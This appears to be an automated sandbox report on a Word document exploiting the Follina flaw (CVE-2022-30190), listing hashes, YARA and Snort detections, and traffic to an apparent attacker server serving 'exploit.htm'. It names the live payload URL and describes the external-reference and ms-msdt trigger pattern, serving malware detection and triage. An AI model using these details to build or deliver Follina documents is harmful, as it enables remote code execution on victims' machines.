Edit tour

Windows Analysis Report
ZDhoKQk8G6.docx

Overview

General Information

Sample Name:	ZDhoKQk8G6.docx
Analysis ID:	645905
MD5:	b64108b4dbb4cc0ceeca091289d3c3e6
SHA1:	ad1eb7107e76f8d75cdb2c3a8cc39179dd490ef0
SHA256:	52b48c4b2f4a63fc6611dea7e9146a440d41e306143788ea20c56c3ab292cf00
Tags:	docdocxFollina
Infos:

Detection

Follina CVE-2022-30190

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Malicious sample detected (through community Yara rule)

Snort IDS alert for network traffic

Contains an external reference to another file

Uses known network protocols on non-standard ports

Detected suspicious Microsoft Office reference URL

Yara signature match

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Internet Provider seen in connection with other malware

Potential document exploit detected (performs HTTP gets)

Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 828 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
document.xml.rels	SUSP_Doc_WordXMLRels_May22	Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard, Wojciech Cieslak	0x39:$a1: <Relationships 0x4ca:$a2: TargetMode="External" 0x4c3:$x2: .htm!
document.xml.rels	INDICATOR_OLE_RemoteTemplate	Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents	ditekSHen	0x480:$olerel: relationships/oleObject 0x499:$target1: Target="http 0x4ca:$mode: TargetMode="External

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x35c2:$re1: location.href = "ms-msdt: 0x5eba:$re1: location.href = "ms-msdt:
dump.pcap	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exploit[1].htm	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exploit[1].htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7341AC3F.htm	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7341AC3F.htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\722BFA5.htm	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\722BFA5.htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exploit[1].htm	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exploit[1].htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
Click to see the 3 entries

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M2 - Source IP: 117.48.146.246 - Destination IP: 192.168.2.22

Timestamp:	117.48.146.246192.168.2.228008491782023942 06/15/22-07:10:36.033223
SID:	2023942
Source Port:	8008
Destination Port:	49178
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) - Source IP: 117.48.146.246 - Destination IP: 192.168.2.22

Timestamp:	117.48.146.246192.168.2.228008491782036726 06/15/22-07:10:36.033223
SID:	2036726
Source Port:	8008
Destination Port:	49178
Protocol:	TCP
Classtype:	Attempted User Privilege Gain

ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M1 - Source IP: 117.48.146.246 - Destination IP: 192.168.2.22

Timestamp:	117.48.146.246192.168.2.228008491782023941 06/15/22-07:10:36.033223
SID:	2023941
Source Port:	8008
Destination Port:	49178
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M1 - Source IP: 117.48.146.246 - Destination IP: 192.168.2.22

Timestamp:	117.48.146.246192.168.2.228008491812023941 06/15/22-07:10:38.181098
SID:	2023941
Source Port:	8008
Destination Port:	49181
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M2 - Source IP: 117.48.146.246 - Destination IP: 192.168.2.22

Timestamp:	117.48.146.246192.168.2.228008491812023942 06/15/22-07:10:38.181098
SID:	2023942
Source Port:	8008
Destination Port:	49181
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) - Source IP: 117.48.146.246 - Destination IP: 192.168.2.22

Timestamp:	117.48.146.246192.168.2.228008491812036726 06/15/22-07:10:38.181098
SID:	2036726
Source Port:	8008
Destination Port:	49181
Protocol:	TCP
Classtype:	Attempted User Privilege Gain

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: ZDhoKQk8G6.docx	Virustotal: Detection: 25%			Perma Link
Source: ZDhoKQk8G6.docx	ReversingLabs: Detection: 17%

Exploits

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exploit[1].htm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7341AC3F.htm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\722BFA5.htm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exploit[1].htm, type: DROPPED

Detected suspicious Microsoft Office reference URL

Source: document.xml.rels

Extracted files from sample: http://117.48.146.246:8008/exploit.htm!

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 117.48.146.246:8008

Source: global traffic

TCP traffic: 192.168.2.22:49178 -> 117.48.146.246:8008

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2023942 ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M2 117.48.146.246:8008 -> 192.168.2.22:49178
Source: Traffic	Snort IDS: 2023941 ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M1 117.48.146.246:8008 -> 192.168.2.22:49178
Source: Traffic	Snort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 117.48.146.246:8008 -> 192.168.2.22:49178
Source: Traffic	Snort IDS: 2023942 ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M2 117.48.146.246:8008 -> 192.168.2.22:49181
Source: Traffic	Snort IDS: 2023941 ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M1 117.48.146.246:8008 -> 192.168.2.22:49181
Source: Traffic	Snort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 117.48.146.246:8008 -> 192.168.2.22:49181

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 8008
Source: unknown	Network traffic detected: HTTP traffic on port 8008 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 8008
Source: unknown	Network traffic detected: HTTP traffic on port 8008 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 8008
Source: unknown	Network traffic detected: HTTP traffic on port 8008 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 8008 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 8008 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 8008
Source: unknown	Network traffic detected: HTTP traffic on port 8008 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 8008
Source: unknown	Network traffic detected: HTTP traffic on port 8008 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 49180 -> 8008
Source: unknown	Network traffic detected: HTTP traffic on port 8008 -> 49180
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 8008
Source: unknown	Network traffic detected: HTTP traffic on port 8008 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 49182 -> 8008
Source: unknown	Network traffic detected: HTTP traffic on port 8008 -> 49182

Source: global traffic	HTTP traffic detected: GET /exploit.htm HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 117.48.146.246:8008Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /exploit.htm HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 117.48.146.246:8008Connection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 117.48.146.246:8008

Source: Joe Sandbox View

ASN Name: CHINA169-BACKBONECHINAUNICOMChina169BackboneCN CHINA169-BACKBONECHINAUNICOMChina169BackboneCN

Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.48.146.246

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jun 2022 05:10:34 GMTContent-Type: text/plainContent-Length: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jun 2022 05:10:35 GMTContent-Type: text/plainContent-Length: 0

Source: ~WRF{365EE8EB-26DD-4793-A79E-4CD05254F7C9}.tmp.0.dr	String found in binary or memory: http://117.48.146.246:8008/exp
Source: ~WRF{365EE8EB-26DD-4793-A79E-4CD05254F7C9}.tmp.0.dr, ~WRS{E3D2E09D-939E-4CE8-8CEF-3005BD062461}.tmp.0.dr	String found in binary or memory: http://117.48.146.246:8008/exploit.htm
Source: ~WRF{365EE8EB-26DD-4793-A79E-4CD05254F7C9}.tmp.0.dr	String found in binary or memory: http://117.48.146.246:8008/exploit.htmyX
Source: document.xml	String found in binary or memory: https://img1.18183.com/image/20220427/1651040288153109.png
Source: document.xml	String found in binary or memory: https://img1.18183.com/image/20220427/1651040297422300.png
Source: document.xml	String found in binary or memory: https://img1.18183.com/image/20220427/1651040303449177.png

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F2A88E0D-A9AE-4C78-97ED-928ECF332904}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /exploit.htm HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 117.48.146.246:8008Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /exploit.htm HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 117.48.146.246:8008Connection: Keep-Alive

System Summary

Malicious sample detected (through community Yara rule)

Source: document.xml.rels, type: SAMPLE

Matched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen

Source: dump.pcap, type: PCAP	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: document.xml.rels, type: SAMPLE	Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
Source: document.xml.rels, type: SAMPLE	Matched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exploit[1].htm, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7341AC3F.htm, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\722BFA5.htm, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exploit[1].htm, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784

Source: ~WRF{365EE8EB-26DD-4793-A79E-4CD05254F7C9}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: ZDhoKQk8G6.docx	Virustotal: Detection: 25%
Source: ZDhoKQk8G6.docx	ReversingLabs: Detection: 17%

Source: ZDhoKQk8G6.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\ZDhoKQk8G6.docx

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$hoKQk8G6.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR5F4E.tmp

Jump to behavior

Source: classification engine

Classification label: mal84.troj.expl.evad.winDOCX@1/22@0/1

Source: ~WRF{365EE8EB-26DD-4793-A79E-4CD05254F7C9}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{365EE8EB-26DD-4793-A79E-4CD05254F7C9}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{365EE8EB-26DD-4793-A79E-4CD05254F7C9}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: ~WRF{365EE8EB-26DD-4793-A79E-4CD05254F7C9}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Contains an external reference to another file

Source: document.xml.rels

Extracted files from sample: http://117.48.146.246:8008/exploit.htm!

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 8008
Source: unknown	Network traffic detected: HTTP traffic on port 8008 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 8008
Source: unknown	Network traffic detected: HTTP traffic on port 8008 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 8008
Source: unknown	Network traffic detected: HTTP traffic on port 8008 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 8008 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 8008 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 8008
Source: unknown	Network traffic detected: HTTP traffic on port 8008 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 8008
Source: unknown	Network traffic detected: HTTP traffic on port 8008 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 49180 -> 8008
Source: unknown	Network traffic detected: HTTP traffic on port 8008 -> 49180
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 8008
Source: unknown	Network traffic detected: HTTP traffic on port 8008 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 49182 -> 8008
Source: unknown	Network traffic detected: HTTP traffic on port 8008 -> 49182

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
